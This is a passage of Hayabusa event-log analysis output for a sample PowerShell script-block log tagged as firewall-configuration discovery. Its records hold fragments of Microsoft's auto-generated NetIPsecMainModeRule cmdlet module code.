Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 